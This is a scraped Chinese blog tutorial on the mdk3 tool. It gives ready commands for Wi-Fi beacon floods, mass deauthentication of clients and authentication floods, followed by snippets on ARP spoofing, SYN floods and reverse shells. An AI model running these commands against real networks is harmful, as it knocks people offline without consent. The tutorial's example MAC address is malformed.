mdk3 <接口> <测试_模块> [测试选项] 例:mdk3 --wlan0mon b (通过mdk3 使用网卡接口调用b类测试模块发起攻击)
请注意该mdk3软件在使用时必须打开网卡捕获功能可以打开一个命令窗口输入
airmon-ng start wlan0 (激活网卡监听功能)

mdk3 wlan0mon b -f /root/wifi.txt -a -s 1500 (通过MDK3使用网卡接口调用B类测试模块 使用root目录下的wifi.txt文件列表制作一个WPA/2加密的WIFI信号并且传输速率为 1500)
所有参数
-f <WIFI名称列表文件的所在位置> 使用此WIFI列表发起信号溢出攻击
-v <带WIFI名称和MAC地址的对应文件所在位置> 使用此WIFI列表和MAC地址列表发起信号溢出攻击
-w 加密方式为WEP
-t 加密方式为WPA/PSK
-a 加密方式为WPA/2
-g 54M模式
-m 读取数据库中的MAC地址列表
-c <信道数> 设置这些伪造的这些WIFI信号的信道数
-s <帧数> 设置广播这些伪造WIFI数据包的速度,速度越快用户接受到的列表越多越快,但是对网卡有一定影响

mdk3 wlan0mon d -b /root/wifi.txt -c 1 -s 1000(通过MDK3使用网卡接口调用D类测试模块 使用root目录下的wifi.txt文件里的MAC地址列表向路由器发出只要黑名单<WIFI.TXT>里的MAC地址全部强制解除认证 该方法只能攻击WIFI信道为1的WIFI信号并且设置发送速度为1000)
所有参数
-w <白名单文件的位置> MAC地址白名单里的所有MAC地址都能正常连接WIFI
-b <黑名单文件的位置> MAC地址黑名单里的所有MAC地址全部解除与路由器的连接
-s <帧数> 设置广播数据包的速度 ,帧数越大,传播速度越快
-c <信道数> 设置要攻击的WIFI信道

mdk3 wlan0mon a -a M2:B6:N4:N2:H7:J0 -m /root/wifi.txt (通过MDK3使用网卡接口调用A类测试模块 使用root目录下的wifi.txt文件来攻击MAC地址为M2:B6:N4:N2:H7:J0的路由器)
所有参数
-a 通过文件里的MAC地址去攻击并且检测被攻击路由器是否有文件中的MAC地址
m 调用数据库中的连接MAC地址
c 不测试被攻击的路由器里有没有文件里的MAC地址(与-a用法相反)
i d对指定路由器MAC地址自动攻击(不用自己创建MAC地址列表文件)
s <帧数> 设置广播数据包的速度 ,帧数越大,传播速度越快

————————————————
版权声明:本文为CSDN博主「我不是猫叔」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/JN_Cat/article/details/102302748

使用Kali MDK3无线攻击的更多相关文章

  1. 安装Kali Linux操作系统Kali Linux无线网络渗透

    安装Kali Linux操作系统Kali Linux无线网络渗透 Kali Linux是一个基于Debian的Linux发行版,它的前身是BackTrack Linux发行版.在该操作系统中,自带了大 ...

  2. 基于kali linux无线网络渗透测试

    1.无线网络渗透测试目前主要有三种方式,分别是暴力破解PIN码,跑握手包,搭建伪热点三种方式,当然还存在其他的方式. 1.1暴力破解 路由器的PIN码由八位0-9的数字组成,PIN码由散步风组成,前四 ...

  3. 用kali执行arp攻击-----------使对方断网

    实现原理 其主要原理是局域网内的"攻击机"通过冒充同网络号下的"受害者主机"的物理地址(mac地址),通过欺骗网关,让网关原来应该发给"受害者主机&q ...

  4. kali syn洪水攻击实例

    kali 172.30.2.241 受攻击:172.30.2.242 syn攻击造成对方cpu跑满 基本上丧失工作能力 攻击语句

  5. Fluxion无线攻击

    使用步骤 github地址 https://github.com/deltaxflux/fluxion 进入到fluxion目录下 ./fluxion 启动fluxion  启动之后会先检测没有安装的 ...

  6. mdk3洪水攻击教程

    使得路由器崩溃,直到重启. 1.iwconfig 查看网卡 2.airmon-ng start wlan0 开启网卡监控 3.airodump-ng mon0 查看附近路由信息 4.mdk3 mon0 ...

  7. Kali社会工程学攻击--powershell 攻击(无视防火墙)

    1.打开setoolkit 输入我们反弹shell的地址与端口 2.修改我的shellcode 3.攻击成功

  8. kali linux 局域网攻击(一)

    一.攻击准备 此为局域网攻击测试 1)查看自己的IP地址,记住默认网关 2)扫描局域网中的IP fping -asg nbtscan -r 网关地址/  3)使用arpspoof进行断网攻击 攻击前, ...

  9. kali 系列学习06 - 攻击之密码破解

    参考书 <kali linux渗透测试技术详解> 清华大学出版社  2015 杨波 一.medusa使用 原理:并行登陆破解 1.只输入单个命令,是查看帮助 root@kali:/tool ...

随机推荐

  1. 2019.12.11 java程序中几种常见的异常以及出现此异常的原因

    1.java.lang.NullpointerException(空指针异常) 原因:这个异常经常遇到,异常的原因是程序中有空指针,即程序中调用了未经初始化的对象或者是不存在的对象. 经常出现在创建对 ...

  2. 认识Dump文件

    一.什么是Dump文件 又叫内存转储文件或者叫内存快照文件.是一个进程或系统在某一给定的时间的快照.比如在进程崩溃时或则进程有其他问题时,甚至是任何时候,我们都可以通过工具将系统或某进程的内存备份出来 ...

  3. 71: libreoj #10151 区间dp

    $des$ https://loj.ac/problem/10151 $sol$ 区间dp $f_{i, j}$ 表示区间 $[l, r]$ 合并的最大值 枚举中间点 $k$ $f_{i, j} =m ...

  4. MuPAD使用总结

    MuPAD使用总结 一.打开notebook界面的方法: 二.notebook界面的三种区域 (一).输入区域 输入区域在打开来的时候就有,就是,但是之后如果还想再加,可以点击上方红色框内的图标. 这 ...

  5. TODO list(咕咕咕。。。

    1. Segment Tree Beats 2. ZR集训补题(还剩10题) 3. 尽可能将各种数据结构写得熟练...(某神仙:要把平衡树写得跟线段树一样熟练) 4. 树相关数据结构和算法(dsu o ...

  6. 详解匿名内部类 ,形参为什么要用final

    一.使用匿名内部类内部类 匿名内部类由于没有名字,所以它的创建方式有点儿奇怪.创建格式如下: new 父类构造器(参数列表)|实现接口() { //匿名内部类的类体部分 } 在这里我们看到使用匿名内部 ...

  7. dropbox icloud and nustore

    dropbox icloud and nustore 这里只是写一下自己的感受. 曾经搜索无数遍, 想着用哪个比较好, 想来比较一下, 还不如自己直接用用看吧. 于是同时用了很久的 dropbx 和 ...

  8. 转载:线性回归建模–变量选择和正则化(1):R包glmnet

    2013-07-15 21:41:04   #本文的目的在于介绍回归建模时变量选择和正则化所用的R包,如glmnet,ridge,lars等.算法的细节尽量给文献,这个坑太大,hold不住啊. 1.变 ...

  9. 用Visual Studio编写UDF的一点小技巧(二)

  10. GIT 安装和升级

    git 安装: http://git-scm.com/download/mac git 升级: $ git clone git://git.kernel.org/pub/scm/git/git.git